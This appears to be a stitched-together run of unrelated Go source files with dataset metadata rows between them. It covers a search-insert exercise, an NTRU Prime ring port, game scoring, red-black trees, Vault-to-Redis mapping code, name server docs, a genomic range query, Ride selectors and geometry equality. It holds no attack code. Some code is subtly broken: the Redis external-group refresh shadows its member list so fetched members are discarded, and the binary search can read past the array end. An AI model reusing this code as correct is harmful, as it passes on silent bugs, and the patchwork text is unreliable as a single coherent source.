Given a sorted array and a target value, return the index if the target is found. If not, return the index where it would be if it were inserted in order.
You may assume no duplicates in the array.
Example 1:
Input: [1,3,5,6], 5
Output: 2
Example 2:
Input: [1,3,5,6], 2
Output: 1
Example 3:
Input: [1,3,5,6], 7
Output: 4
Example 4:
Input: [1,3,5,6], 0
Output: 0
给定一个排序数组和一个目标值,在数组中找到目标值,并返回其索引。如果目标值不存在于数组中,返回它将会被按顺序插入的位置。
你可以假设数组中无重复元素。
示例 1:
输入: [1,3,5,6], 5
输出: 2
示例 2:
输入: [1,3,5,6], 2
输出: 1
示例 3:
输入: [1,3,5,6], 7
输出: 4
示例 4:
输入: [1,3,5,6], 0
输出: 0
*/
// 解法一:这题是简单题,对时间复杂度没有要求,所以用普通的遍历也可以
// 时间复杂度O(n) 空间复杂度O(1)
/*func searchInsert(nums []int, target int) int {
numsLen := len(nums)
if numsLen == 0 || nums[0] > target {
return 0
}
if nums[0] == target {
return 0
}
for i := 0; i < numsLen-1; i++ {
if nums[i] == target {
return i
} else if nums[i] < target && target <= nums[i+1] {
return i + 1
}
}
return numsLen
}
*/
// 解法一简化一下
/*
func searchInsert(nums []int, target int) int {
numsLen := len(nums)
for i := 0; i < numsLen; i++ {
if nums[i] >= target {
return i
}
}
return numsLen
}
*/
// 解法二 运用二分查找,
// 先把查找的范围简化一下,排除不在数组范围的情况
/*Runtime: 4 ms, faster than 100.00% of Go online submissions for Search Insert Position.
Memory Usage: 3 MB, less than 100.00% of Go online submissions for Search Insert Position.*/
func binSearch(nums []int, low, high, target int) int {
if low > high {
return -1
}
mid := (low + high) / 2
if nums[mid] == target {
return mid
} else if target > nums[mid] && target < nums[mid+1] {
return mid + 1
} else if target > nums[mid]-1 && target < nums[mid] {
return mid
}
if target < nums[mid] && target >= nums[low] {
return binSearch(nums, low, mid-1, target)
}
return binSearch(nums, mid+1, high, target)
}
func searchInsert(nums []int, target int) int {
numsLen := len(nums)
if numsLen == 0 || nums[0] > target {
return 0
}
if nums[numsLen-1] < target {
return numsLen
}
return binSearch(nums, 0, numsLen-1, target)
}
func main() {
// input := []int{1, 3, 5, 6}
input := []int{1}
fmt.Println(searchInsert(input, 1))
} | Programs/035Search Insert Position/035Search Insert Position.go | 0.568176 | 0.656032 | 035Search Insert Position.go | starcoder |
// This file implements operations in Rq, a univariate quotient polynomial
// ring over GF(q) with modulus x^761 + 4590*x + 4590. It is a port of the
// public domain, C reference implementation.
package rq
import (
"github.com/companyzero/sntrup4591761/rq/modq"
"github.com/companyzero/sntrup4591761/rq/vector"
)
// swapInt swaps x and y if mask is -1. If mask is 0, x and y retain
// their original values.
func swapInt(x, y *int, mask int) {
t := mask & (*x ^ *y)
*x ^= t
*y ^= t
}
// smallerMask compares x and y, returning -1 if y > x, and 0 otherwise.
func smallerMask(x, y int) int {
return (x - y) >> 31
}
// Reciprocal produces the inverse r of a polynomial 3*s in Rq.
// If s is not invertible, Reciprocal returns -1, and 0 otherwise.
func Reciprocal3(r *[761]int16, s *[761]int8) int {
// f starts as the modulus of Rq.
f := new([761 + 1]int16)
f[0] = -1
f[1] = -1
f[761] = 1
// g starts as 3*s
g := new([761 + 1]int16)
for i := 0; i < 761; i++ {
g[i] = int16(3 * s[i])
}
d := 761
e := 761
loops := 2*761 + 1
u := make([]int16, loops+1)
v := make([]int16, loops+1)
v[0] = 1
for i := 0; i < loops; i++ {
// c = (lc(g)/lc(f)) % 3
c := modq.Quotient(g[761], f[761])
// g = g - f*c; g <<= 1
vector.MinusProduct(g[:], 761+1, g[:], f[:], c)
vector.Shift(g[:], 761+1)
// v = v - u*c
vector.MinusProduct(v, loops+1, v, u, c)
vector.Shift(v, loops+1)
// swap (e,d), (f,g), and (u,v) if d > e and lc(g) != 0
e--
m := smallerMask(e, d) & modq.MaskSet(g[761])
swapInt(&e, &d, m)
vector.Swap(f[:], g[:], 761+1, m)
vector.Swap(u, v, loops+1, m)
}
vector.Product(r[:], 761, u[761:], modq.Reciprocal(f[761]))
return smallerMask(0, d)
}
func Round3(h, f *[761]int16) {
for i := 0; i < 761; i++ {
h[i] = int16(((21846*int32(f[i]+2295)+32768)>>16)*3 - 2295)
}
}
// Mult returns the product h of f and g in Rq.
func Mult(h, f *[761]int16, g *[761]int8) {
fg := new([761*2 - 1]int16)
for i := 0; i < 761; i++ {
r := int16(0)
for j := 0; j <= i; j++ {
r = modq.PlusProduct(r, f[j], int16(g[i-j]))
}
fg[i] = r
}
for i := 761; i < 761*2-1; i++ {
r := int16(0)
for j := i - 761 + 1; j < 761; j++ {
r = modq.PlusProduct(r, f[j], int16(g[i-j]))
}
fg[i] = r
}
for i := 761*2 - 2; i >= 761; i-- {
fg[i-761] = modq.Sum(fg[i-761], fg[i])
fg[i-761+1] = modq.Sum(fg[i-761+1], fg[i])
}
for i := 0; i < 761; i++ {
h[i] = fg[i]
}
} | rq/rq.go | 0.733165 | 0.44089 | rq.go | starcoder |
package wow
// ScoreCalculator contains methods for calculating a character's score related to specific
// properties of a character.
type ScoreCalculator interface {
Calculate(Character) int
}
// -- Aggregate score calculator.
// AggregateScoreCalculator ties together other score calculators and provides a single score for
// all of them combined.
type AggregateScoreCalculator struct {
calculators []ScoreCalculator
}
// AddCalculator adds a score calculator to get a score from.
func (c *AggregateScoreCalculator) AddCalculator(calculator ScoreCalculator) {
c.calculators = append(c.calculators, calculator)
}
// Calculate a score based on a combination of the results of other score calculators.
func (c *AggregateScoreCalculator) Calculate(character Character) int {
var score int
for _, calculator := range c.calculators {
score += calculator.Calculate(character)
}
return score
}
// -- Achievement score calculator.
// AchievementScoreCalculator calculates a character's achievement score, based on the total number
// of achievement points.
type AchievementScoreCalculator struct{}
// Calculate a score for the character's achievement points.
func (c AchievementScoreCalculator) Calculate(character Character) int {
return character.AchievementPoints / 2
}
// -- Item score calculator.
// ItemsScoreCalculator calculates a character's item's score, based on item level and quality.
type ItemsScoreCalculator struct{}
// Calculate a score for the character's items.
func (c ItemsScoreCalculator) Calculate(character Character) int {
var score int
items := character.Items
weighting := 1
score += calculateItemScore(items.Head, weighting)
score += calculateItemScore(items.Neck, weighting)
score += calculateItemScore(items.Shoulder, weighting)
score += calculateItemScore(items.Back, weighting)
score += calculateItemScore(items.Chest, weighting)
score += calculateItemScore(items.Wrist, weighting)
score += calculateItemScore(items.Hands, weighting)
score += calculateItemScore(items.Waist, weighting)
score += calculateItemScore(items.Legs, weighting)
score += calculateItemScore(items.Feet, weighting)
score += calculateItemScore(items.Finger1, weighting)
score += calculateItemScore(items.Finger2, weighting)
score += calculateItemScore(items.Trinket1, weighting)
score += calculateItemScore(items.Trinket2, weighting)
// 2-handed weapons should have double the score.
mainHandWeighting := 2
if items.OffHand.ID != 0 {
mainHandWeighting = weighting
score += calculateItemScore(items.OffHand, weighting)
}
score += calculateItemScore(items.MainHand, mainHandWeighting)
return score
}
// calculateItemScore calculates a given item's score, with a given weighting.
func calculateItemScore(item Item, weighting int) int {
return (item.ItemLevel * weighting) * item.Quality
}
// -- Professions score calculator.
// ProfessionsScoreCalculator calculates a character's title score.
type ProfessionsScoreCalculator struct{}
// Calculate a score for the character's professions.
func (c ProfessionsScoreCalculator) Calculate(character Character) int {
return calculateProfessionsScore(character.Professions.Primary, 30) +
calculateProfessionsScore(character.Professions.Secondary, 10)
}
// calculateProfessionsScores takes a collection of professions and calculates a score, with the
// given weighting.
func calculateProfessionsScore(professions []Profession, weighting int) int {
var score int
for _, profession := range professions {
if profession.MaxRank == 0 {
continue
}
score += ((100 / profession.MaxRank) * profession.Rank) * weighting
}
return score
}
// -- Progression score calculator.
// TitleScoreCalculator calculates a character's title score.
type ProgressionScoreCalculator struct{}
// Calculate a score for the character's progression.
func (c ProgressionScoreCalculator) Calculate(character Character) int {
var score int
for _, raid := range character.Progression.Raids {
score += raid.LFRClears * 100
score += raid.NormalClears * 200
score += raid.HeroicClears * 300
score += raid.MythicClears * 400
}
return score
} | step2/modules/wow/score-calculator.go | 0.825062 | 0.560914 | score-calculator.go | starcoder |
package special
import "github.com/aegoroff/godatastruct/rbtree"
// maxTree represents Red-black search binary tree
// that stores only limited size of max possible values
type maxTree struct {
// tree contains underlying Red-black search binary tree
tree rbtree.RbTree
size int64
}
func (t *maxTree) Root() *rbtree.Node {
return t.tree.Root()
}
func (t *maxTree) Len() int64 {
return t.tree.Len()
}
// Insert inserts node into tree which size is limited
// Only <size> max nodes will be in the tree
func (t *maxTree) Insert(c rbtree.Comparable) {
min := t.tree.Minimum()
if t.tree.Len() < t.size || min.Key().Less(c) {
if t.Len() == t.size {
t.Delete(min.Key())
}
t.tree.Insert(c)
}
}
func (t *maxTree) ReplaceOrInsert(c rbtree.Comparable) rbtree.Comparable {
min := t.tree.Minimum()
if t.tree.Len() < t.size || min.Key().Less(c) {
if t.Len() == t.size {
t.Delete(min.Key())
}
return t.tree.ReplaceOrInsert(c)
}
return nil
}
func (t *maxTree) Delete(c rbtree.Comparable) bool {
return t.tree.Delete(c)
}
func (t *maxTree) DeleteAll(c rbtree.Comparable) bool {
return t.tree.DeleteAll(c)
}
func (t *maxTree) Search(value rbtree.Comparable) (rbtree.Comparable, bool) {
return t.tree.Search(value)
}
func (t *maxTree) Floor(value rbtree.Comparable) (rbtree.Comparable, bool) {
return t.tree.Floor(value)
}
func (t *maxTree) Ceiling(value rbtree.Comparable) (rbtree.Comparable, bool) {
return t.tree.Ceiling(value)
}
func (t *maxTree) SearchAll(value rbtree.Comparable) []rbtree.Comparable {
return t.tree.SearchAll(value)
}
func (t *maxTree) SearchNode(value rbtree.Comparable) (*rbtree.Node, bool) {
return t.tree.SearchNode(value)
}
func (t *maxTree) Minimum() *rbtree.Node {
return t.tree.Minimum()
}
func (t *maxTree) Maximum() *rbtree.Node {
return t.tree.Maximum()
}
func (t *maxTree) OrderStatisticSelect(i int64) (*rbtree.Node, bool) {
return t.tree.OrderStatisticSelect(i)
}
// minTree represents Red-black search binary tree
// that stores only limited size of min possible values
type minTree struct {
// tree contains underlying Red-black search binary tree
tree rbtree.RbTree
size int64
}
func (t *minTree) Root() *rbtree.Node {
return t.tree.Root()
}
func (t *minTree) Len() int64 {
return t.tree.Len()
}
// Insert inserts node into tree which size is limited
// Only <size> min nodes will be in the tree
func (t *minTree) Insert(c rbtree.Comparable) {
max := t.tree.Maximum()
if t.tree.Len() < t.size || !max.Key().Less(c) {
if t.tree.Len() == t.size {
t.tree.Delete(max.Key())
}
t.tree.Insert(c)
}
}
func (t *minTree) ReplaceOrInsert(c rbtree.Comparable) rbtree.Comparable {
max := t.tree.Maximum()
if t.tree.Len() < t.size || !max.Key().Less(c) {
if t.tree.Len() == t.size {
t.tree.Delete(max.Key())
}
return t.tree.ReplaceOrInsert(c)
}
return nil
}
func (t *minTree) Delete(c rbtree.Comparable) bool {
return t.tree.Delete(c)
}
func (t *minTree) DeleteAll(c rbtree.Comparable) bool {
return t.tree.DeleteAll(c)
}
func (t *minTree) Search(value rbtree.Comparable) (rbtree.Comparable, bool) {
return t.tree.Search(value)
}
func (t *minTree) Floor(value rbtree.Comparable) (rbtree.Comparable, bool) {
return t.tree.Floor(value)
}
func (t *minTree) Ceiling(value rbtree.Comparable) (rbtree.Comparable, bool) {
return t.tree.Ceiling(value)
}
func (t *minTree) SearchAll(value rbtree.Comparable) []rbtree.Comparable {
return t.tree.SearchAll(value)
}
func (t *minTree) SearchNode(value rbtree.Comparable) (*rbtree.Node, bool) {
return t.tree.SearchNode(value)
}
func (t *minTree) Minimum() *rbtree.Node {
return t.tree.Minimum()
}
func (t *minTree) Maximum() *rbtree.Node {
return t.tree.Maximum()
}
func (t *minTree) OrderStatisticSelect(i int64) (*rbtree.Node, bool) {
return t.tree.OrderStatisticSelect(i)
}
// NewMaxTree creates new fixed size tree that stores <sz> max values
func NewMaxTree(sz int64) rbtree.RbTree {
return &maxTree{
tree: rbtree.New(),
size: sz,
}
}
// NewMinTree creates new fixed size tree that stores <sz> min values
func NewMinTree(sz int64) rbtree.RbTree {
return &minTree{
tree: rbtree.New(),
size: sz,
}
} | rbtree/special/fixed_tree.go | 0.827096 | 0.439687 | fixed_tree.go | starcoder |
package redis
import (
"plutus/vault"
)
// RefreshUserToGroups refreshes the User to Group and the Group to User mappings in the database
func (c *Client) RefreshUserToGroups(data *vault.Data) error {
namespace := data.Namespace
c.deleteAllWithAnyPrefixes(namespace, PrefixUsrToVgr, PrefixVgrToUsr)
groups := data.Groups
aliases := data.Aliases
for grpName, group := range groups {
memberIDS := group.MemberEntityIds
for _, mID := range memberIDS {
username := aliases[mID].Name
c.sAdd(namespace, PrefixUsrToVgr, username, grpName)
c.sAdd(namespace, PrefixVgrToUsr, grpName, username)
}
}
return nil
}
// RefreshGroupToPolicies refreshes the Group to Policy and the Policy to Group mappings in the database
func (c *Client) RefreshGroupToPolicies(data *vault.Data) error {
namespace := data.Namespace
c.deleteAllWithAnyPrefixes(namespace, PrefixVgrToPol, PrefixPolToVgr)
groups := data.Groups
for grpName, group := range groups {
policies := group.Policies
for _, policyName := range policies {
c.sAdd(namespace, PrefixVgrToPol, grpName, policyName)
c.sAdd(namespace, PrefixPolToVgr, policyName, grpName)
}
}
return nil
}
// RefreshUserToEntity refreshes the Entity to Policy and the Policy To Entity mappinga in the database
func (c *Client) RefreshUserToEntity(data *vault.Data) error {
namespace := data.Namespace
c.deleteAllWithAnyPrefixes(namespace, PrefixUsrToEnt, PrefixEntToUsr)
entities := data.Entities
aliases := data.Aliases
for entityID := range entities {
alias := aliases[entityID].Name
c.set(namespace, PrefixUsrToEnt, alias, entityID)
c.set(namespace, PrefixEntToUsr, entityID, alias)
}
return nil
}
// RefreshEntityToPolicies refreshes the Entity to Policy mapping in the database
func (c *Client) RefreshEntityToPolicies(data *vault.Data) error {
namespace := data.Namespace
c.deleteAllWithAnyPrefixes(namespace, PrefixEntToPol, PrefixPolToEnt)
entities := data.Entities
for entityID, entity := range entities {
policies := entity.Policies
for _, policyName := range policies {
c.sAdd(namespace, PrefixEntToPol, entityID, policyName)
c.sAdd(namespace, PrefixPolToEnt, policyName, entityID)
}
}
return nil
}
// RefreshUserToExternalGroups refreshes the User to ExternalGroupName mapping in the database
// Only those external groups are refreshed that are a part of the vault roles
func (c *Client) RefreshUserToExternalGroups(data *vault.Data) error {
namespace := data.Namespace
c.deleteAllWithAnyPrefixes(namespace, PrefixUsrToEgr, PrefixEgrToUsr)
roles := data.Roles
membersCache := make(map[string][]string) // group name to member names
for _, role := range roles {
externalGroup := role.ExternalGroupName
var members []string
if cachedMembers, ok := membersCache[externalGroup]; ok {
members = cachedMembers
} else {
members, err := c.groupsReader.Members(externalGroup)
if err != nil {
return err
}
membersCache[externalGroup] = members
}
for _, member := range members {
c.sAdd(namespace, PrefixUsrToEgr, member, externalGroup)
c.sAdd(namespace, PrefixEgrToUsr, externalGroup, member)
}
}
return nil
}
// RefreshExternalGroupToRoles refreshes the ExternalGroupName to Role mapping in the database
// Only those external groups are refrshed that are a part of the vault roles
func (c *Client) RefreshExternalGroupToRoles(data *vault.Data) error {
namespace := data.Namespace
c.deleteAllWithAnyPrefixes(namespace, PrefixEgrToRol, PrefixRolToEgr)
roles := data.Roles
for roleName, role := range roles {
externalGroup := role.ExternalGroupName
c.sAdd(namespace, PrefixEgrToRol, externalGroup, roleName)
c.sAdd(namespace, PrefixRolToEgr, roleName, externalGroup)
}
return nil
}
// RefreshRoleToPolicies refreshes the Role to Policy mapping in the database
func (c *Client) RefreshRoleToPolicies(data *vault.Data) error {
namespace := data.Namespace
c.deleteAllWithAnyPrefixes(namespace, PrefixRolToPol, PrefixPolToRol)
roles := data.Roles
for roleName, role := range roles {
policies := role.Policies
for _, policy := range policies {
c.sAdd(namespace, PrefixRolToPol, roleName, policy)
c.sAdd(namespace, PrefixPolToRol, policy, roleName)
}
}
return nil
}
// RefreshPathToPolicy refreshes the Path To Policy mapping in the database
func (c *Client) RefreshPathToPolicy(data *vault.Data) error {
namespace := data.Namespace
c.deleteAllWithAnyPrefixes(namespace, PrefixPatToPol, PrefixPolToPat)
policies := data.Policies
for policyName, policy := range policies {
for _, path := range policy.Paths {
encodedPath, err := path.Encode()
if err != nil {
return err
}
c.sAdd(namespace, PrefixPolToPat, policyName, encodedPath)
// encodedPath is added to have the policy name and the capabilities
c.sAdd(namespace, PrefixPatToPol, path.Path, encodedPath)
}
}
return nil
} | redis/refresh.go | 0.679391 | 0.429908 | refresh.go | starcoder |
package api
import (
. "github.com/gocircuit/circuit/gocircuit.org/render"
)
func RenderNamePage() string {
return RenderHtml("Using name servers", Render(nameBody, nil))
}
const nameBody = `
<h2>Using name servers</h2>
<p>Name server elements are an easy way of creating and configuring
lightweight DNS server dynamically.
<p>To create a name server element,
use the following method of the <code>Anchor</code> interface:
<pre>
MakeNameserver(addr string) (Nameserver, error)
</pre>
<p>The creation of a new name server element results in starting
a lightweight DNS server (which is serviced by the circuit daemon itself)
on the respective host where the anchor lives.
<p>If the address argument is the empty string, the DNS server will pick
an available port to listen to. Otherwise, it will try to bind itself to <code>addr</code>.
<p>An application error may be returned if either (i) the underlying anchor is
already busy with another element, or (ii) the DNS server could not bind
to the provided address parameter.
<p>Internally, the DNS server is implemented using <a href="http://github.com/miekg/dns">github.com/miekg/dns</a>.
<p>A name server can be stopped and discarded by either using the <code>Scrub</code> method of the
name server element itself, or by using the <code>Scrub</code> method of the anchor that the
name server element is attached to.
<p>Name server elements have a simple interface:
<pre>
type Nameserver interface {
Set(rr string) error
Unset(name string)
Peek() NameserverStat
Scrub()
}
</pre>
<h3>Manipulating records</h3>
<p>Name servers maintain a set of unique <em>names</em>, together with a set of <em>records</em>
associated with each name.
<p>New records are added using the <code>Set</code> method. The argument of <code>Set</code> is
a DNS resource record in standard DNS notation. The syntax of these records are described in more detail
in the documentation of <a href="http://github.com/miekg/dns">github.com/miekg/dns</a>
as well as this <a href="http://miek.nl/posts/2014/Aug/16/go-dns-package/">related blog article</a>.
<p>Every DNS resource record, for instance <code>"miek.nl. 3600 IN MX 10 mx.miek.nl."</code>,
starts with the name that the record pertains to. Each invocation of the <code>Set</code> command
<em>adds</em> a record to the list of records pertaining to the respective name.
For instance, the following command adds the record <code>"miek.nl. 3600 IN MX 10 mx.miek.nl."</code>
to the name <code>"miek.nl."</code>
<pre>
if err := ns.Set("miek.nl. 3600 IN MX 10 mx.miek.nl."); err != nil {
… // DNS record cannot be recognized
}
</pre>
<p>The <code>Unset</code> method removes <em>all</em> records associated with a given name. For instance,
<pre>
ns.Unset("miek.nl.")
</pre>
<h3>Server status</h3>
<p>At any point, the user can asynchronously retrieve the current status of a name server element,
using the <code>Peek</code> method of the element. The returned structure (shown below)
contains a textual representation of the DNS server's address, and a map of all names and their
associated lists of resource records.
<pre>
type NameserverStat struct {
Address string
Records map[string][]string
}
</pre>
` | gocircuit.org/api/name.go | 0.653348 | 0.571557 | name.go | starcoder |
package prefix_sums
/*
A DNA sequence can be represented as a string consisting of the letters A, C, G and T, which correspond to the types
of successive nucleotides in the sequence. Each nucleotide has an impact factor, which is an integer. Nucleotides of
types A, C, G and T have impact factors of 1, 2, 3 and 4, respectively. You are going to answer several queries of the
form: What is the minimal impact factor of nucleotides contained in a particular part of the given DNA sequence?
The DNA sequence is given as a non-empty string S = S[0]S[1]...S[N-1] consisting of N characters. There are M queries,
which are given in non-empty arrays P and Q, each consisting of M integers. The K-th query (0 ≤ K < M) requires you to
find the minimal impact factor of nucleotides contained in the DNA sequence between positions P[K] and Q[K] (inclusive).
For example, consider string S = CAGCCTA and arrays P, Q such that:
P[0] = 2 Q[0] = 4
P[1] = 5 Q[1] = 5
P[2] = 0 Q[2] = 6
The answers to these M = 3 queries are as follows:
The part of the DNA between positions 2 and 4 contains nucleotides G and C (twice), whose impact factors are 3 and 2
respectively, so the answer is 2.
The part between positions 5 and 5 contains a single nucleotide T, whose impact factor is 4, so the answer is 4.
The part between positions 0 and 6 (the whole string) contains all nucleotides, in particular nucleotide A whose impact
factor is 1, so the answer is 1.
Write a function:
func Solution(S string, P []int, Q []int) []int
that, given a non-empty zero-indexed string S consisting of N characters and two non-empty zero-indexed arrays P and Q
consisting of M integers, returns an array consisting of M integers specifying the consecutive answers to all queries.
The sequence should be returned as:
a Results structure (in C), or
a vector of integers (in C++), or
a Results record (in Pascal), or
an array of integers (in any other programming language).
For example, given the string S = CAGCCTA and arrays P, Q such that:
P[0] = 2 Q[0] = 4
P[1] = 5 Q[1] = 5
P[2] = 0 Q[2] = 6
the function should return the values [2, 4, 1], as explained above.
Assume that:
N is an integer within the range [1..100,000];
M is an integer within the range [1..50,000];
each element of arrays P, Q is an integer within the range [0..N − 1];
P[K] ≤ Q[K], where 0 ≤ K < M;
string S consists only of upper-case English letters A, C, G, T.
Complexity:
expected worst-case time complexity is O(N+M);
expected worst-case space complexity is O(N), beyond input storage (not counting the storage required for input arguments).
*/
func GenomicRangeQuery(S string, P []int, Q []int) []int {
A, C, G := prefixSSums(S)
response := make([]int, len(P))
for idx, _ := range (P) {
if A[Q[idx] + 1] - A[P[idx]] > 0 {
response[idx] = 1
} else if C[Q[idx] + 1] - C[P[idx]] > 0 {
response[idx] = 2
} else if G[Q[idx] + 1] - G[P[idx]] > 0 {
response[idx] = 3
} else {
response[idx] = 4
}
}
return response
}
func prefixSSums(S string) ([]int, []int, []int) {
n := len(S)
A := make([]int, n + 1)
C := make([]int, n + 1)
G := make([]int, n + 1)
for i := 1; i < n + 1; i++ {
s := string(S[i - 1])
A[i] = A[i - 1]
C[i] = C[i - 1]
G[i] = G[i - 1]
if s == "A" {
A[i] += 1
} else if s == "C" {
C[i] += 1
} else if s == "G" {
G[i] += 1
}
}
return A, C, G
} | prefix-sums/GenomicRangeQuery.go | 0.86053 | 0.967349 | GenomicRangeQuery.go | starcoder |
package ride
func selectFunctionsByName(v int, enableInvocation bool) (func(string) (rideFunction, bool), error) {
switch v {
case 1, 2:
return functionsV2, nil
case 3:
return functionsV3, nil
case 4:
return functionsV4, nil
case 5:
if enableInvocation {
return functionsV5, nil
}
return expressionFunctionsV5, nil
case 6:
if enableInvocation {
return functionsV6, nil
}
return expressionFunctionsV6, nil
default:
return nil, EvaluationFailure.Errorf("unsupported library version '%d'", v)
}
}
func selectFunctions(v int) (func(id int) rideFunction, error) {
switch v {
case 1, 2:
return functionV2, nil
case 3:
return functionV3, nil
case 4:
return functionV4, nil
case 5:
return functionV5, nil
case 6:
return functionV6, nil
default:
return nil, EvaluationFailure.Errorf("unsupported library version '%d'", v)
}
}
func selectFunctionChecker(v int) (func(name string) (uint16, bool), error) {
switch v {
case 1, 2:
return checkFunctionV2, nil
case 3:
return checkFunctionV3, nil
case 4:
return checkFunctionV4, nil
case 5:
return checkFunctionV5, nil
case 6:
return checkFunctionV6, nil
default:
return nil, EvaluationFailure.Errorf("unsupported library version '%d'", v)
}
}
func selectEvaluationCostsProvider(v, ev int) (map[string]int, error) {
switch v {
case 1, 2:
switch ev {
case 1:
return EvaluationCatalogueV2EvaluatorV1, nil
default:
return EvaluationCatalogueV2EvaluatorV2, nil
}
case 3:
switch ev {
case 1:
return EvaluationCatalogueV3EvaluatorV1, nil
default:
return EvaluationCatalogueV3EvaluatorV2, nil
}
case 4:
switch ev {
case 1:
return EvaluationCatalogueV4EvaluatorV1, nil
default:
return EvaluationCatalogueV4EvaluatorV2, nil
}
case 5:
switch ev {
case 1:
return EvaluationCatalogueV5EvaluatorV1, nil
default:
return EvaluationCatalogueV5EvaluatorV2, nil
}
case 6: // Only new version of evaluator works after activation of RideV6
return EvaluationCatalogueV6EvaluatorV2, nil
default:
return nil, EvaluationFailure.Errorf("unsupported library version '%d'", v)
}
}
func selectFunctionNameProvider(v int) (func(int) string, error) {
switch v {
case 1, 2:
return functionNameV2, nil
case 3:
return functionNameV3, nil
case 4:
return functionNameV4, nil
case 5:
return functionNameV5, nil
case 6:
return functionNameV6, nil
default:
return nil, EvaluationFailure.Errorf("unsupported library version '%d'", v)
}
}
func selectConstants(v int) (func(int) rideConstructor, error) {
switch v {
case 1:
return constantV1, nil
case 2:
return constantV2, nil
case 3:
return constantV3, nil
case 4:
return constantV4, nil
case 5:
return constantV5, nil
case 6:
return constantV6, nil
default:
return nil, EvaluationFailure.Errorf("unsupported library version '%d'", v)
}
}
func selectConstantsChecker(v int) (func(name string) (uint16, bool), error) {
switch v {
case 1:
return checkConstantV1, nil
case 2:
return checkConstantV2, nil
case 3:
return checkConstantV3, nil
case 4:
return checkConstantV4, nil
case 5:
return checkConstantV5, nil
case 6:
return checkConstantV6, nil
default:
return nil, EvaluationFailure.Errorf("unsupported library version '%d'", v)
}
} | pkg/ride/selectors.go | 0.560734 | 0.579906 | selectors.go | starcoder |
package tegola
// IsPointEqual will check to see if the two tegola points are equal.
func IsPointEqual(p1, p2 Point) bool {
if p1 == nil || p2 == nil {
return p1 == p2
}
return p1.X() == p2.X() && p1.Y() == p2.Y()
}
// IsPoint3Equal will check to see if the two 3d tegola points are equal.
func IsPoint3Equal(p1, p2 Point3) bool {
return p1.X() == p2.X() && p1.Y() == p2.Y() && p1.Z() == p2.Z()
}
// IsMultiPointEqual will check to see if the two provided multipoints are equal
func IsMultiPointEqual(mp1, mp2 MultiPoint) bool {
pts1, pts2 := mp1.Points(), mp2.Points()
if len(pts1) != len(pts2) {
return false
}
for i, pt := range pts1 {
if !IsPointEqual(pt, pts2[i]) {
return false
}
}
return true
}
// IsLineStringEqual will check to see if the two linesstrings provided are equal.
func IsLineStringEqual(l1, l2 LineString) bool {
pts1, pts2 := l1.Subpoints(), l2.Subpoints()
if len(pts1) != len(pts2) {
return false
}
for i, pt := range pts1 {
if !IsPointEqual(pt, pts2[i]) {
return false
}
}
return true
}
// IsMultiLineEqual will check to see if the two Multilines that are provided are equal.
func IsMultiLineEqual(ml1, ml2 MultiLine) bool {
lns1, lns2 := ml1.Lines(), ml2.Lines()
if len(lns1) != len(lns2) {
return false
}
for i, ln := range lns1 {
if !IsLineStringEqual(ln, lns2[i]) {
return false
}
}
return true
}
// PolygonIsEqual will check to see if the two provided polygons are equal.
func IsPolygonEqual(p1, p2 Polygon) bool {
lns1, lns2 := p1.Sublines(), p2.Sublines()
if len(lns1) != len(lns2) {
return false
}
for i, ln := range lns1 {
if !IsLineStringEqual(ln, lns2[i]) {
return false
}
}
return true
}
// MultiPolygonIsEqual will check to see if the two provided multi-polygons are equal.
func IsMultiPolygonEqual(mp1, mp2 MultiPolygon) bool {
pgs1, pgs2 := mp1.Polygons(), mp2.Polygons()
if len(pgs1) != len(pgs2) {
return false
}
for i, pg := range pgs1 {
if !IsPolygonEqual(pg, pgs2[i]) {
return false
}
}
return true
}
// GeometryIsEqual will check to see if the two given geometeries are equal. This function does not check to see if there are any
// recursive structures if there are any recursive structures it will hang. If the type of the geometry is unknown, it is assumed
// that it does not match any other geometries.
func IsGeometryEqual(g1, g2 Geometry) bool {
switch geo1 := g1.(type) {
case Point:
geo2, ok := g2.(Point)
if !ok {
return false
}
return IsPointEqual(geo1, geo2)
case Point3:
geo2, ok := g2.(Point3)
if !ok {
return false
}
return IsPoint3Equal(geo1, geo2)
case MultiPoint:
geo2, ok := g2.(MultiPoint)
if !ok {
return false
}
return IsMultiPointEqual(geo1, geo2)
case LineString:
geo2, ok := g2.(LineString)
if !ok {
return false
}
return IsLineStringEqual(geo1, geo2)
case MultiLine:
geo2, ok := g2.(MultiLine)
if !ok {
return false
}
return IsMultiLineEqual(geo1, geo2)
case Polygon:
geo2, ok := g2.(Polygon)
if !ok {
return false
}
return IsPolygonEqual(geo1, geo2)
case MultiPolygon:
geo2, ok := g2.(MultiPolygon)
if !ok {
return false
}
return IsMultiPolygonEqual(geo1, geo2)
case Collection:
geo2, ok := g2.(Collection)
if !ok {
return false
}
return IsCollectionEqual(geo1, geo2)
}
// If we don't know the type, we will assume they don't match.
return false
}
// CollectionIsEqual will check to see if the provided collections are equal. This function does not check to see if the collections
// contain any recursive structures, and if there are any recursive structures it will hang. If the collections contains any unknown
// geometries it will be assumed to not match.
func IsCollectionEqual(c1, c2 Collection) bool {
geos1, geos2 := c1.Geometries(), c2.Geometries()
if len(geos1) != len(geos2) {
return false
}
for i, geo := range geos1 {
if !IsGeometryEqual(geo, geos2[i]) {
return false
}
}
return true
} | isequal.go | 0.749821 | 0.810704 | isequal.go | starcoder |
package streams
// GetPipelineQueryParams represents valid query parameters for the GetPipeline operation
// For convenience GetPipelineQueryParams can be formed in a single statement, for example:
// `v := GetPipelineQueryParams{}.SetVersion(...)`
type GetPipelineQueryParams struct {
// Version : version
Version string `key:"version"`
}
func (q GetPipelineQueryParams) SetVersion(v string) GetPipelineQueryParams {
q.Version = v
return q
}
// GetPipelinesStatusQueryParams represents valid query parameters for the GetPipelinesStatus operation
// For convenience GetPipelinesStatusQueryParams can be formed in a single statement, for example:
// `v := GetPipelinesStatusQueryParams{}.SetActivated(...).SetCreateUserId(...).SetName(...).SetOffset(...).SetPageSize(...).SetSortDir(...).SetSortField(...)`
type GetPipelinesStatusQueryParams struct {
// Activated : activated
Activated *bool `key:"activated"`
// CreateUserId : createUserId
CreateUserId string `key:"createUserId"`
// Name : name
Name string `key:"name"`
// Offset : offset
Offset *int32 `key:"offset"`
// PageSize : pageSize
PageSize *int32 `key:"pageSize"`
// SortDir : sortDir
SortDir string `key:"sortDir"`
// SortField : sortField
SortField string `key:"sortField"`
}
func (q GetPipelinesStatusQueryParams) SetActivated(v bool) GetPipelinesStatusQueryParams {
q.Activated = &v
return q
}
func (q GetPipelinesStatusQueryParams) SetCreateUserId(v string) GetPipelinesStatusQueryParams {
q.CreateUserId = v
return q
}
func (q GetPipelinesStatusQueryParams) SetName(v string) GetPipelinesStatusQueryParams {
q.Name = v
return q
}
